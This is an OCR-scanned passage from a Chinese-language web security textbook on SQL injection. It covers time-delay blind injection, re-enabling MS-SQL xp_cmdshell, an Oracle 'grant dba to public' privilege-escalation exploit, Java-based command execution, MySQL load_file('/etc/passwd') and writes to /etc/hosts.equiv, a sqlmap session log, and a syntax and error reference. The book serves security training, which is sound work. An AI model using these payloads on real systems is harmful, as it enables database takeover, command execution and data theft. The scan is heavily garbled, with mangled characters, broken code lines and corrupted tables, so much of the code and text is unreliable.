在 5.0.12 版 本 之 前 的 MySQL 中 ， 不 能 使 用 睡眠 函数 ， 但 可 以 使 用 
基准 函数 (benchmark function) 重复 执行 一 个 特定 的 操作 。 指 示 数 据 
库 执 行 一 个 处 理 器 密集 型 操作 ， 如 SHA-1 散 列 ， 大 量 的 操作 次 数 将 造 
成 一 次 可 测量 的 时 间 延 迟 。 例 如 : 


select if(luser(} like ot@s', benchmark(50000,shal[('test')), ‘'false') 


aie 中 可 使 用 PG_SLEEP 函 数 ， 其 使 用 方法 mee 
眠 画 数 相同 。 

在 Oracle 中 ， 没 有 产生 时 间 延 迟 的 内 置 方 法 ， 一 种 方法 是 使 用 
UTL_HTTP 连 接 一 个 不 存在 的 服务 圳 造成 一 次 操作 超时 。 这 会 使 数 
据 库 尝试 与 指定 的 服务 器 建立 连接 ， 并 最 终 造成 超时 。 例 如 : 


SELECT ‘'a'||Uti tp.recuest('http://madeupserver.com') from dual 
delay... 

ORA-29273: HTTP recuest faliec 

ORA-06512: at "SYS.UTL HTTP", line 1556 

ORA-12545: Connect failed becaus arget host or obje do n =x i 


可 以 利用 这 种 行为 根据 指 ee . 件 造成 时 间 延 迟 。 例 如 。 p 
果 默 认 的 Oracle 帐 户 DBSNMP 存 在 ， 下 面 的 查询 将 会 造成 一 次 超时 : 


SELECT ‘a'|[Utl_ Http. request ('http://madeupserver.com'} FROM dual WHERE 
(SELECT username PROM all_users WHERE username 'DBSNMP' } 'DBSNMP' 
如 前 所 述 ， 在 Oracle 和 和 MySQL 数据 库 中 ， 都 可 以 使 用 
SUBSTR(UNG) 和 ASCII 函 数 每 次 一 字 世 地 获取 任意 信息 。 


Vo ”提示 我 们 已 经 说 明了 如 何 使 用 时 间 延 迟 来 获得 有 用 的 信 
思 。 然 而 ， 当 对 应 用 程序 进行 初步 探查 、 检 测 SQL 注 入 漏洞 时 ， 时 
间 延 迟 技巧 也 可 能 非常 有 用 。 在 一 些 完 全 言 目的 SQL 注入 攻击 中 ， 
浏览 右 中 不 会 显示 查询 结果 ， 所 有 错误 都 被 应 用 程序 以 隐 含 的 方式 
处 理 ， 使 用 提交 专门 设计 的 输入 的 标准 技巧 可 能 很 难 检 测 出 漏洞 。 


这 时 ， 使 用 时 间 延 迟 是 在 初步 探查 过 程 中 检测 一 个 漏洞 是 否 存 在 的 
最 有 效 方法 。 例 如 ， 如 果 后 端 数据 库 为 MS-SQL ， 那 么 可 以 将 下 面 
的 两 个 字符 串 轮 流 注 入 每 个 请 求 参数 中 ， 并 监控 应 用 程序 啊 应 请 求 
所 用 的 时 间 ， 从 而 确定 所 有 漏洞 : 

‘ waitfor delay ‘0:30:0’-- 

1; waitfor delay ‘0:30:0’-- 


尝试 访问 


本 实验 示例 包含 一 个 不 会 返回 任何 错误 反馈 的 SQL 注 入 漏洞， 
可 使 用 它 练习 各 种 高 级 技巧 ， 包 括 条 件 式 啊 应 和 时 间 延 迟 。 
http://mdsec.net/addressbook/44/ 


9.2.11 SQL 注入 之 外 : 扩大 数据 库 攻 击 范 围 


成 功利 用 一 个 SQL 注入 漏洞 往往 可 完全 控制 应 用 程序 的 所 有 数 
据 。 大 多 数 应 用 程序 仅 使 用 一 个 账户 访问 数据 库 ， 并 且 依 赖 应 用 程序 
层 控制 在 不 同 的 用 户 间 实 施 访问 隔离 。 如 果 能 够 无 限制 地 使 用 应 用 程 
序 的 数据 库 账 户 ， 就 可 以 自由 访问 其 中 的 数据 。 

因此 ， 可 以 假设 ， 拥 有 应 用 程序 的 所 有 数据 是 SQL 注入 攻击 的 最 
终 目 的 。 然 而 ， 许 多 原因 表明 ， 利 用 数据 库 中 的 漏洞 ， 或 者 控制 它 的 
一 些 内 置 功 能 以 达到 目的 ， 从 而 进一步 实施 攻击 ， 可 能 会 取得 更 大 的 
成 效 。 通 过 扩大 数据 库 攻 击 范围 可 实施 的 其 他 攻击 如 下 。 

口 如 果 数 据 库 被 其 他 应 用 程序 共享 ， 可 以 通过 提升 数据 库 的 使 用 
权限 访问 其 他 应 用 程序 的 数据 。 

口 可 以 攻破 数据 库 服务 器 的 操作 系统 。 

口 可 以 访问 其 他 系统 。 通 常 ， 数 据 库 服 务 器 是 一 个 在 几 层 网 络 边 
界 防御 保护 下 的 网 络 中 的 主机 。 如 果 能 够 控制 数据 库 服 务 器 ， 攻 击 者 
就 处 在 一 个 可 信 的 位 置 上 ， 可 以 访问 其 他 主机 上 的 关键 服务 ， 进 一 步 
对 其 加 以 利用 。 

口 可 以 在 主机 基础 架构 与 自己 的 计算 机 之 间 建 立 网 络 连 接 。 这 
样 ， 攻 击 者 就 可 以 完全 避 开 应 用 程序 的 防御 ， 轻 易 传送 从 数据 库 收 集 
到 的 大 量 敏感 数据 ， 并 且 可 穿 透 许多 入 侵 检测 系统 。 

口 可 以 通过 创建 用 户 定义 的 功能 任意 扩充 数据 库 的 现 有 功能 。 有 
些 时 候 ， 可 以 通过 这 种 方式 重新 执行 已 被 删除 或 禁用 的 功能 ， 避 开 数 
据 库 实 施 的 强化 保护 措施 。 只 要 已 经 获得 数据 库 管理 员 (DBA) 权 
限 ， 就 有 办 法 在 每 种 主流 数据 库 中 执行 这 种 操作 。 


号 错误 观点 ”许多 数据 库 管 理 员 认 为 ， 数 据 库 没有 必要 防御 
需要 通过 验证 才能 加 以 利用 的 攻击 。 他 们 以 为 ， 只 有 相同 组 织 拥有 


的 可 信 应 用 程序 才能 访问 数据 库 。 这 种 观点 忽略 了 恶意 第 三 方 利用 
应 用 程序 中 存在 的 缺陷 ， 在 应 用 程序 认为 安全 的 育 景 下 与 数据 库 欧 
互 的 可 能 性 。 刚 刚 描 述 的 每 一 种 可 能 的 攻击 证 明 ， 数 据 库 必须 防御 
通过 验证 的 攻击 者 。 


攻击 数据 库 是 一 个 内 容 广泛 的 主题 ， 它 不 在 本 书 的 讨论 范围 之 
内 。 本 贡 将 分 析 几 种 关键 方法 ， 说 明 如 何 通过 它们 利用 主要 数据 库 的 
漏 润 和 功能 扩大 攻击 范围 。 我 们 得 出 的 主要 结论 是 : 每 种 数据 库 都 有 
提升 权限 的 可 能 性 。 应 用 当前 发 布 的 安全 补丁 和 可 靠 的 强化 措施 能 够 
帮助 避免 许多 (但 并 非 全 部 ) 这 种 攻击 。 
1. MS-SQL 

Bx es OC ein FB A ae) Be Bd Be exp_cmdshell## fifths, € 
是 MS-SQL 默 认 内 置 的 一 项 功能 。 这 个 存储 过 程 允 许 数 据 库 管 理 员 用 
户 以 和 cmd.exe 命 令 提 示 符 相同 的 方式 执行 操作 系统 命令 。 例 如 : 


master..xp_cmdshell ‘ipconfig > foo.txt' 


攻击 者 可 在 众多 情况 下 滥用 这 项 功能 。 他 们 可 以 执行 任意 命令 ， 
将 结果 指 回 本 地 文件 ， 然 后 读 取 文件 内 容 。 他 们 可 以 打开 一 个 连通 目 
己 计算 机 的 带 外 网 络 连 接 ， 并 建立 一 条 秘密 的 命令 和 通信 渠道 ， 从 服 
务 需 复制 数据 并 上 传 攻击 工具 。 由 于 MS-SQL 默 认 以 LocalSystem 运 
行 ， 攻 击 者 一 般 能 够 完全 攻破 基本 的 操作 系统 ， 执 行 任 意 操作 。MS- 
SQL 中 还 有 许多 其 他 存储 过 程 ， 如 xp_regread 或 xp_regwrite， 也 可 用 于 
在 Windows 操 作 系 统 注册 表 中 执行 强大 的 操作 。 

e 处理 默认 锁定 

互联 网 上 的 大 多 数 MS-SQL 为 MS-SQL 2005 或 更 高 版 本 。 这 些 版 
A 可 以 在 默认 情况 下 锁定 数据 库 ， 以 防止 各 种 攻 


但 是 ， 如 果 数 据 库 中 的 Web 应 用 程序 用 户 账户 拥有 足够 高 的 权 
限 ， 则 通过 重新 设置 数据 库 ， 该 用 户 就 可 以 突破 上 述 功 能 实施 的 限 
制 。 例 如 ， 可 以 使 用 sp_configure 存 储 过 程 重新 启用 被 禁用 的 
xp_cmdshell。 以 下 4 行 SQL 代 码 用 于 实现 这 一 目的 : 


EXECUTE sp_configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 

EXECUTE sp_configure 'xp_cmdshell', '1' 
RECONFIGURE WITH OVERRIDE 


这 样 ，xp_cmdshell 就 被 重新 局 用， 并 可 以 通过 以 下 命令 运行 


exec xp_cmdshell '‘'dir' 


2. Oracle 

人 们 已 在 Oracle 数 据 库 软 件 中 发 现 了 大 量 安 全 漏洞 。 如 果 找 到 一 
个 允许 执行 任意 查询 的 SQL 注入 漏洞 ， 那 么 束 可 以 利用 这 种 漏洞 提升 

到 数据 库 管 理 员 权限 。 

Oracle 包 含 许多 可 在 数据 库 管 理 员 权限 下 运行 的 内 置 的 存储 过 
程 ， 并 已 发 现在 这 些 存 储 过 程 中 存在 SQL 注入 漏洞 。 在 2006 年 7 月 发 布 
重要 补丁 前 ， 存 在 于 默认 包 
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 
中 的 缺陷 就 是 一 个 典型 的 示例 。 攻 击 者 可 以 利用 这 个 缺陷 ， 在 易 受 攻 
击 的 字段 中 注入 grant DBA to public 查 询 来 提升 权限 。 


select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TASLES {'INDX' 
'TEXTINDEXMETHODS" .ODCIIndexUtilCleanup(:p1); execute immediate 
‘declare pragma autcnomcus_transa TPPA piace execute immediate 

crant dba te public Nee ens) RRND sate! NC ] 0) from dual 


这 种 类 型 的 攻击 可 通过 利用 Web 应 用 程序 中 的 SQL 注入 漏洞 在 

易 受 攻击 的 参数 中 注入 函数 来 实现 。 

除 这 些 漏 洞 外 ，Oracle 还 含有 大 量 默认 功能 ， 这 些 功能 可 被 低 权 
限 用 2 访问 ， 并 可 用 于 执行 各 种 敏感 操作 ， 如 建立 网 络 连接 或 访问 文 
件 系统 。 除 了 前 面 描述 的 用 于 建立 市 外 连接 的 功能 强大 的 包 以 外 ， 
UTL_FILE 包 可 用 于 在 数据 库 服 务 器 文件 系统 上 读 取 和 写 入 文件 。 

2010 年 ，David Litchfield 演 示 了 如 何在 Oracle 10g R2 和 11g 中 利用 
Java 来 执行 操作 系统 命令 。 该 攻击 首先 利用 
DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY 中 的 缺陷 授予 当前 用 
户 java.io. 人 lepermission 权 限 ， 然后 使 用 DBMS_JAVA.RUNJAVA 执行 运 
行 操作 系统 命令 的 Java 类 (oracle/aurora/util/Wrapper) 。 例 如 : 


DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper c:\\windows\\system32\\ 


CmG .exe /c dir>c:\\OUT.LST') 


请 访问 以 下 链接 了 解 相 关 详情 : 

g www.databasesecurity.com/HackingAurora.gdf 

g www.notsosecure.com/folder2/2010/08/02blackhat-2010/ 
3. MySQL 

与 前 面 讨论 的 其 他 数据 库 相 比 ，MySQL 中 包含 的 可 被 攻击 者 滥用 
的 内 置 功能 相对 较 少 。 其 中 一 个 示例 是 任何 拥有 FILE_PRIV 许 可 的 用 
户 都 可 以 读 取 并 写 入 文件 系统 。 

LOAD_FILE 命 令 可 用 于 获取 任何 文件 的 内 容 。 例 如 : 


select load_file('/etc/passwd' ) 


SELECT ...INTO OUTFILE 命令 可 用 于 将 任何 一 个 查询 的 输出 指 
回 一 个 文件 。 例 如 : 


create table test (a varchar(200)) 
insert into test({a) values ('+ +') 


select * from test into outfile '/etc/hosts.equiv' 


a 这 下 并 写 入 关键 的 操作 系统 文人 外 ， 这 些 命令 还 可 用 于 执行 
P o 


口 因 为 MySQL 将 数据 保存 在 明文 文件 中 ， 数 据 库 必须 拥有 读 取 这 
些 文 件 的 权限 。 拥 有 FILE_PRIV 许 可 的 攻击 者 可 以 打开 相关 文件 并 读 
取 数 据 库 中 的 任何 数据 ， 避 开 数 据 库 实 施 的 任何 访问 控制 。 

口 MySQL 人 允许 用 户 通 过 调用 一 个 包含 图 数 执行 过 程 的 编译 库 文 件 

(compiled library file) 创建 一 个 用 户 定义 的 函数 (UDF) 。 这 个 文件 

必须 位 于 MySQL 加 载 动态 库 的 正常 路 径 内 。 攻 击 者 可 以 使 用 前 面 描述 
的 方法 在 这 个 路 径 中 创建 任意 二 进 制 文件 ， 然 后 建立 使 用 这 个 文件 的 
UDF。 请 参阅 Chris Anley 的 论文 “Hackproofing MySQL” 了 解 这 种 技巧 
的 详情 。 


9.2.12 ”使 用 SQL 注入 工具 


我 们 介绍 的 许多 利用 SQL 注入 漏洞 的 攻击 技巧 都 需要 提交 大 量 请 
求 ， 以 逐次 提取 少量 的 数据 。 幸 运 的 是 ， 我 们 可 以 使 用 各 种 工具 来 目 
动 完成 上 述 过 程 ， 同 时 ， 这 些 工 具 还 能 够 识别 成 功 实施 攻击 所 需 的 数 
据 库 特定 的 语法 。 

当前 ， 多 数 工具 通过 以 下 方法 来 利用 SQL 注 入 漏洞 。 


口 对 目标 请 求 中 的 所 有 参数 实施 亦 力 攻击 ， 以 查找 SQL 注入 点 。 
口 通过 附加 各 种 字符 ， 如 闭 括号 、 注 释 字 符 和 SQL 关键 字 ， 确 定 
后 端 SQL 查询 中 易 受 攻击 的 字段 的 位 置 。 

口 通过 蛮 力 猜测 请 求 的 列 数 ， 然 后 确定 包含 varchar 数 据 类 型 的 列 
(可 用 于 返回 结果 ) ， 尝 试 实施 UNION 攻 击 。 

口 注入 定制 查询 来 检索 任意 数据 一 一 如 果 需 要 ， 将 多 个 列 中 的 数 
人 
行 检索 。 

口 如 果 无 法 使 用 UNION 检 索 结 果 ， 可 以 在 查询 中 注入 布尔 型 条 件 
(AND 1=1 ` AND 1=2 等 ) ， 以 确定 是 否 可 以 使 用 条 件 响应 来 检索 数 
据 。 

口 如 果 无 法 通过 注入 条 件 表达 式 来 检索 结果 ， 可 以 尝试 使 用 条 件 
时 间 延 迟 来 检索 数据 。 

这 些 工具 通过 在 目标 数据 库 中 查询 相关 元 数据 表 来 查找 数据 。 通 
常 ， 它 们 能 够 执行 一 定 程度 的 权限 提升 ， 如 使 用 xp_cmdshell 获 得 操作 
系统 级 访问 权限 。 它 们 还 使 用 各 种 优化 技巧 ， 并 利用 各 种 数据 库 中 的 
诸多 功能 和 内 置 函数 ， 以 减少 基于 推测 的 蛮 力 攻击 所 需 提 交 的 查询 
数 ， 避 开 可 能 对 单 引 号 实施 的 过 滤 ， 等 等 。 


T 注解 这 些 工具 是 主要 的 注入 工具 ， 最 适 于 通过 利用 已 确 
定 并 熟悉 的 注入 点 ， 从 数据 库 中 提取 数据 。 但 是 ， 在 查找 并 利用 


SQL 广 入 缺陷 方面 ， 它 们 也 不 是 万 能 的 。 实 际 上 ， 在 通过 这 些 工 具 
注入 数据 之 前 或 之 后 ， 通 前 需要 提供 其 他 一 些 SQL 语 法 ， 以 确保 这 
些 工 具 的 硬 编码 攻击 生效 。 


渗透 测试 步骤 


使 用 本 章 前 面部 分 介绍 的 技巧 确定 某 个 SQL 注入 漏洞 后 ， 可 以 
考虑 使 用 SQL 注入 工具 来 利用 该 漏洞 ， 并 从 数据 库 中 检索 有 用 的 数 
"在 需要 使 用 盲目 技巧 每 次 检索 少量 数据 时 ， 这 种 做 法 尤其 有 
ny ° 

(1) 使 用 拦截 代理 服务 器 运行 SQL 注 入 工具 ， 分 析 该 工具 提交 
的 请 求 以 及 应 用 程序 的 响应 。 打 开工 具 上 的 任何 详细 输出 选项 ， 并 
将 它 的 进度 与 观察 到 的 查询 和 响应 关联 起 来 。 
(2) 由 于 这 些 工具 通常 依赖 预先 设置 的 测试 和 特定 的 响应 语 
法 ， 因 此 ， 攻 击 者 可 能 需要 将 数据 附加 或 前 置 到 这 些 工 具 注 入 的 字 
符 串 中 ， 以 确保 获得 预期 的 啊 应 。 典 型 的 要 求 包括 添加 注释 字符 、 
平衡 服务 器 的 SQL 查询 中 的 单 引 号 ， 以 及 将 财 括 号 前 置 或 附加 到 字 
符 串 以 与 原始 碍 询 匹 配 。 
(3) 如 果 尽 管 采用 了 上 述 方法 ， 但 查询 语法 仍然 无 效 ， 这 
时 ， 最 人 简单 的 方法 是 创建 完全 受 控 制 的 垦 套 人 查询， 并 使 用 注入 工具 
注入 该 子 查 询 。 这 样 ， 注 入 工具 束 可 以 通过 推断 来 提取 数据 。 在 注 
入 标准 的 SELECT 和 UPDATE 查 询 时 ， 骨 套 查询 非常 有 用 。 在 Oracle 
中 ， 扒 套 查 询 位 于 INSERT 语 句 中 。 下 面 的 示例 前 置 [inputl 之 前 的 文 
本 ， 并 附加 该 位 置 之 后 的 闭 括 号 : 
g Oracle: ’||(select 1 from dual where 1=[input]) 
O MS-SQL: (select 1 where 1=[input]) 


有 大 量 工 具 可 用 于 实施 目 动 SQL 注入 攻击 。 其 中 许多 工具 针对 
MS-SQL， 其 他 一 些 工 具 已 停止 开发 ， 并 因为 新 技巧 的 出 现 和 SQL 注 
入 领域 的 发 展 而 上 废弃。 笔者 推荐 sqlmap， 该 工具 可 用 于 攻击 MySQL、 
Oracle、MS-SQL 及 其 他 数据 库 。 它 执行 基于 UNION 和 推断 的 检索 ， 

并 且 文 持 各 种 权限 提升 方法 ， 包 括 从 操作 系统 中 检索 文件 ， 以 及 在 
Windows 中 使 用 xp_cmdshell 执 行 命令 。 

实际 上 ，sqlmap 是 一 种 通过 时 间 延 迟 或 其 他 推 师 方法 检索 数据 库 
言 轧 的 有 效 工 具 ， 并 且 可 用 于 基于 UNION 的 检索 。 利 用 该 工具 的 最 佳 
方法 之 一 ， 是 使 用 --sql-shell 选 项 。 这 样 ， 攻 击 者 将 能 够 在 SQL 提示 符 


下 于 后 台 执 行 必 要 的 UNION、 基 于 错误 或 盲目 的 SQL 注 入 ， 以 发 送 和 
检索 结果 。 例 如 : 


C:\sqlmap>sqlmas.py -u httso://wahh-aop.com/employees?Empno=7369 --union-use 
--sql-shell -p Empno 


eqlimap/0.8 - automatic SQL injection and database takeover tool 
http://sqlmap.sourceforge.net 


{*] starting at: 14:54:39 


[14:54:39] [INFO] using 'C:\sqimap\output \wanh-appo.com\session' 
as session file 
(14:54:39) [INFO] testing conmmecticn to the target url 
[14:54:40] [WARNING] the testable parameter 'Empno' you provided is not 
inte the 
Cockie 
[14:54:40] [INFO] testing if the url is stable, wait a few seconds 
[14:54:44] [INFO] url is stable 
[14:54:44] [INFO] testing sql injection on GET parameter 'Empno‘ with 0 
parenthesis 
[14:54:44] [INFO] testing unescaped numeric injection on GET parameter 
'Empno' 
[14:54:46] [INFO] confirming unescaped numeric injection on GET 
parameter 'Empno' 
[14:54:47] [INFO] GET parameter ‘Empno' is umescaped numeric injectable 
with 0 
parenthesis 
[14:54:47] [INFO] testing for parenthesis on injectable parameter 
[14:54:50] [INFO) the injectable parameter requires 0 parenthesis 
[14:54:50] [INFO] testing MySQL 
[14:54:51] [WARNING] the back-end DMBS is not MySQL 
[14:54:51] [INFO] testing Oracle 
[14:54:52] [INFO] confirming Oracle 
[14:54:53] [INFO] the back-end DBMS is Oracle 
web server operating system: Windows 2000 
web application technology: ASP, Microsoft IIS 5.0 
back-end DBMS: Oracle 


[14:54:53] [INFO] testing inband sel injection on parameter 'Empno' with 
NULL 
brutefercing technique 
[14:54:58] [INFO] confirming full inband sql injection on parameter 
' Empric ' 
[14:55:00] [INFO] the target url is affected by an exploitable full 


yl inject 让 
valid union: ‘http: //wahh-app.com: 80 /employees.asp?Empno-7369%20 

INI $20ALLE SEI 
BCT? TULLE 2C¥2 ONULL32C%32 ONULLBE2ZCE2 ONULLY3 2 OFROMG2 ODUAL-- ND 

14:55:00) INF( allin à h I 1 i 
press ENTER 

-$ l | nr re VSV r 

io you nt t et eve the L statement output nl 
[14:55:19] [INFO] fetching SOL SELECT starement query output: ‘select banner 


select b er from v$version [ 
] B 2:0.i.9 x ction 
| L L Version G PA A A ction 
] ) 9 Tt | Edi ' e 9 E Jucti 
] F elease 0.1. = i 
] TNS for ł ndows: Version 9.2.0 cti 


9.2.13 ”SQL 语法 与 错误 参考 


我 们 已 经 描述 了 各 种 探查 与 利用 Web 应 用 程序 中 存在 的 SQL 注入 
漏洞 所 需 的 技巧 。 许 多 时 候 ， 向 不 同 的 后 端 数据 库 平台 实施 攻击 时 需 
要 用 到 的 语法 之 间 存 在 一 些 细微 的 差别 。 另 外 ， 每 一 种 数据 库 都 生成 
不 同 的 错误 消息 ， 当 探查 各 种 漏洞 以 及 党 试 设计 一 种 有 效 的 利用 手段 
时 ， 需 要 理解 它们 的 含义 。 下 面 简 要 介绍 这 些 语法 和 这 些 语法 的 适用 
情况 ， 并 解释 使 用 过 程 中 出 现 的 一 些 不 常见 的 错误 消息 。 

1. SQL 语法 


要 求 ASCII 和 SUBSTRING 

Oracle ”ASCII(A') 等 于 65 SUBSTR(‘ABCDE',2,3) BCD 
MS-SQL ASCII(A') 等 于 65 SUBSTRING(ABCDE',2,3) 等 于 BCD 
MySQL ”ASCII(A') 等 于 65 SUBSTRING(ABCDE',2,3) 等 于 BCD 


要 求 获取 当前 数据 库 用 户 


Oracle Select Sys.login_user from dual 


SELECT user FROM dual 
SYS_CONTEXT('USERENV','SESSION_USER') 


MS-SQL select suser_sname() 
MySQL SELECT user() 


要 求 引起 时 间 延 迟 
Oracle Utl_Http.request('http://madeupserver.com') 
MS-SQL waitfor delay '0:0:10' exec master..xp_cmdshell ping localhost' 
MySQL sleep(100) 


要 求 获取 数据 库 版 本 字符 串 
Oracle select banner from v$version 
MS-SQL select version 
MySQL select version 
要 求 获取 当前 数据 库 
Oracle SELECT SYS_CONTEXT(‘USERENV',"DB_NAME') FROM 
dual 
MS- select db_name() 


SQL HEURA Ar PA] EH : 


select servername 
MySQL Select database() 


要 求 获取 当前 用 户 的 权限 
Oracle SELECT privilege FROM session_privs 
MS- SELECT grantee, table_name, privilege_type FROM 


SQL INFORMATION_SCHEMA.TABLE_PRIVILEGES 
MySQL SELECT * FROM information_schema.user_privileges 


WHERE grantee = '[user]' HE Ah [user] H SELECT user0 的 输入 
决定 


要 求 在 一 个 单独 的 结果 列 中 显示 所 有 表 和 列 
Oracle Select table_namel||' 
'||column_name from all_tab_columns 
MS-SQL SELECT table_name+' 
',column_name from information_schema.columns 


MySQL SELECT CONCAT(table_name+' 
',column_name) from information_schema.columns 


要 求 显示 用 户 对 象 
Oracle Select object_name, object_type from user_objects 
MS- SELECT name FROM sysobjects 
SQL 
MySQL SELECT table_name FROM information_schema.tables (或 


trigger_name from 
information_schema.triggers = ) 


要 求 显示 用 户 表 


Oracle Select object_name, object type from 
user_objectsWHEREobject_type="TABLE' 
或 者 显示 用 户 访问 的 所 有 表 : SELECT table_name FROM 
all_tables 


MS- SELECT name FROM sysobjectsWHERExtype='U' 


MySQL SELECT table_name FROM information_schema.tables 
where table_type='BASE TABLE ' and table_schema!='mysql1' 


要 求 显示 表 foo 的 列 名 称 


Oracle Select column_name, Name from user_tab_columns where 
table_name = 
FOO' 如 果 目 标 数据 不 为 当前 应 用 程序 用 户 所 有 ， 使 用 
ALL table_columns 表 


MS- SELECT column_name, FROM information_schema.columns 
SQL WHERE table_name='foo' 


MySQL SELECT column_name FROM information_schema.columns 
WHERE table_name='foo' 


要 求 与 操作 系统 交互 (最 简单 的 方式 ) 
Oracle ”请 参阅 David Litchfield 所 著 的 The Oracle Hacker's Handbook 
= 
MS- exec xp_cmshell 'dir c:\' 
SQL 


MySQL select load_file('/etc/passwd') 
2. SQL 错误 消息 


Oracle ORA-01756: quoted string not properly terminated 
ORA-00933:SQLcommand not properly ended 


MS- Msg 170, Level 15, State 1, Line 1 

SQL Line 1: Incorrect syntax near ‘foo 
Msg 105, Level 15, State 1, Line 1 
Unclosed quotation mark before the character 
string ‘foo 


MySQL You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL server version for 
the right 
syntax to use near "foo' at line X 


原因 “对 Oracle 和 MS-SQL 而 言 ，SQL 注 入 确实 存在 ， 并 且 几 乎 肯 
定 可 以 加 以 利用 。 如 果 输 入 一 个 单 引 号 ， 它 改变 数据 库 查 询 
的 语法 ， 这 是 预料 之 中 的 错误 


Oracle 


MS- 
SQL 


MySQL 


对 MySQL 而 言 ，SQL 注 入 可 能 存在 ， 但 相同 的 错误 消息 可 能 
出 现在 其 他 情况 下 


PLS-00306: wrong number or types of arguments 
in call to 'XXX' 


Procedure 'X XX' expects parameter '@YYY', 
which was not supplied 


N/A 


原因 


Oracle 


MS- 
SQL 


MySQL 


RA 


已 经 注释 掉 或 删 挥 一 个 通常 会 提交 给 数据 库 的 变量 。 在 MS- 
SQL 中 ， 应 该 可 以 使 用 时 间 延 迟 

枚 举 获 得 任意 数据 

ORA-01789: query block has incorrect number of 

result columns 

Msg 205, Level 16, State 1, Line 1 

All queries in an SQL statement containing a 

UNION operator must have an equal number of 

expressions in their target lists. 


The used SELECT statements have a different number of 
columns 


当 试 图 实施 UNION SELECT 攻 击 时 ， 就 会 看 到 这 个 错误 消 


Oracle 


MS- 
SQL 


MySQL 
原因 


息 ; 攻击 者 指定 了 一 个 与 原始 

SELECT 语句 不 同 的 列 效 

ORA-01790: expression must have same datatype 
as corresponding expression 


Msg 245, Level 16, State 1, Line 1 
Syntax error converting the varchar value 
foo' to a column of data type int. 


(在 MySQL 中 不 会 造成 任何 错误 ) 
当 试 图 实施 UNION SELECT 攻 击 时 ， 就 会 看 到 这 个 错误 消 


A, 攻击 者 指定 了 一 个 与 原始 
eer o 尝试 使 用 NULL ， 或 者 使 用 1 
BY 2000 


Oracle ORA-01722: invalid number 
ORA-01858: a non-numeric character was found 
where a numeric was expected 


MS- Msg 245, Level 16, State 1, Line 1 
SQL Syntax error converting the varchar value 
foo' to a column of data type int. 


MySQL (在 MySQL 中 不 会 造成 任何 错误 ) 
原因 ”输入 与 字段 中 需要 的 数据 类 型 不 匹配 。 可 能 存在 SQL 注入 漏 
洞 ， 可 能 不 需要 一 个 单 引 号 ， 
此 尝试 输入 一 个 数字 ， 后 接 注 入 的 SQL 查询 
在 MS-SQL 中 ， 应 该 可 以 利用 这 条 错误 消息 返回 任何 字符 串 


Oracle ORA-00923: FROM keyword not found where expected 


MS- N/A 
SQL 
MySQL N/A 
原因 下 面 的 语句 可 在 MS-SQL 中 运行 : 
SELECT 1 
但 在 Oracle 中 ， 如 果 想 要 返回 任何 内 容 ， 必 须 从 一 个 表 中 选 
择 。 使 用 DUAL 表 即 可 : 


SELECT 1 from DUAL 


Oracle ORA-00936: missing expression 


MS- Msg 156, Level 15, State 1, Line 1 
SQL Incorrect syntax near the keyword ‘from’. 


MySQL You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL 
server version for the right syntax to use 
near ' XXX , YYY from SOME _ TABLE ' at line 1 


原因  ” 当 注 入 点 出 现在 FROM 关 键 字 之 前 (例如 ， 注 入 了 将 要 返回 
的 列 ) 或 使 用 注释 符号 删除 了 不 可 
缺少 的 SQL 关 键 字 时 ， 常 常会 看 到 这 条 错误 消息 


Oracle 


MS- 
SQL 


MySQL 


ee AEF PF RS QL ta A 


遇 到 这 种 条 件 时 ，MySQL 可 以 揭示 列 名 XXX, YYY 


ORA-00972: identifier is too long 


String or binary data would be truncated. 


N/A 


这 条 错误 消息 并 不 表示 存在 SQL 注入 漏洞 。 如 果 遇 到 一 个 超 


原因 


Oracle 


MS- 
SQL 


MySQL 


KANAB, FRG Baa i 
TRIBE o HAT FEBS Ke, AKRE EEEH 
处 理 输入 

ORA-00942: table or view does not exist 

Msg 208, Level 16, State 1, Line 1 

Invalid object name 'foo' 


Table 'DBNAME.SOMETABLE' doesn't exist 


原因 


Oracle 


要 么 是 因为 正 试图 访问 一 个 不 存在 的 表 或 视图 ， 要 么 在 
Oracle 中 ， 数 据 库 用 户 并 不 拥有 访问 

该 表 或 视图 的 权限 。 对 一 个 已 知 能 够 访问 的 表 (如 DUAL 
表 ) 测试 查询 


当 遇 到 这 种 条 件 时 ，MySQL 应 可 以 揭示 当前 的 数据 库 模 式 
DBNAME 


ORA-00920: invalid relational operator 


MS-SQL Msg 170, Level 15, State 1, Line 1 


MySQL 


Line 1: Incorrect syntax near foo 


You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL 
server version for the right syntax to use 

near " at line 1 


原因 


Oracle 


MS- 
SQL 


MySQL 


可 能 更 改 了 WHERE 子 句 的 内 容 ，SQL 注 入 试图 使 语法 中 断 


ORA-00907: missing right parenthesis 
N/A 


You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL 
server version for the right syntax to use 

near " at line 1 


SQL 注入 生效 ， 但 注入 点 在 圆 括 号 内 。 可 能 是 由 于 用 注入 的 


原因 


Oracle 


MS- 
SQL 


MySQL 


原因 


Oracle 


MS- 
SQL 


MySQL 
原因 


注释 字符 (--) 把 结尾 的 圆 括号 
当做 注释 处 理 了 


ORA-00900: invalid SQL statement 
Msg 170, Level 15, State 1, Line 1 
Line 1: Incorrect syntax near foo 


You have an error in your SQL syntax. Check 

the manual that corresponds to your MySQL 

server version for the right syntax to use 

near XXXXXX 

一 条 常规 错误 消息 。 前面 列 出 的 错误 消息 会 优先 于 这 条 错误 
消息 显示 ， 因 此 肯定 出 现 了 其 他 

问题 。 可 以 答 试 另 一 种 输入 ， 以 获得 一 条 提供 更 多 信息 的 请 


PARN 


ORA-03001: unimplemented feature 
N/A 


N/A 


执行 了 一 个 Oracle 人 禁止 的 操作 。 如 果 位 于 UPDATE 或 INSERT 
查询 中 ， 但 却 试图 从 v$version 


显示 数据 库 版 本 字符 串 ， 台 会 出 现 这 条 消 县 


Oracle ORA-02030: can only select from fixed tables/views 


MS- N/A 
SQL 
MySQL N/A 


原 可 能 试图 编辑 一 个 SYSTEM 视 图 。 如 果 位 于 UPDATE 或 
INSERT 查 询 中 ， 但 却 试图 从 
voversion fg. SAUER AER, BLA HS SAI E 


